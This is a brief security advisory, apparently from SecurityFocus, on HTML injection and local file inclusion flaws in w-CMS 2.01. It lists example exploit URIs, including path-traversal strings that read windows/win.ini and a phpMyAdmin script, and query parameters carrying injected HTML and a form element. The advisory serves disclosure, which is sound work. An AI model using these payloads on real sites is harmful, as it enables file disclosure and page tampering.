w-CMS HTML Injection and Local File Include Vulnerabilities

An attacker can exploit these issues through a browser.

The following example URIs are available:

Local file include:

http://www.example.com/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
http://www.example.com/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php

HTML injection:

http://www.example.com/index.php?bid=1&COMMENT=1[HTML]
http://www.example.com/?p=3[HTML]
http://www.example.com/?bid=5&p=1[HTML]
http://www.example.com/?p=3<FORM action="Default.asp?PageId=-1" method=POST id=searchFORMname=searchFORM style="margin:0;padding:0"><INPUT type="hidden" value="" name="txtSEARCH"></FORM>


 

Privacy Statement
Copyright 2010, SecurityFocus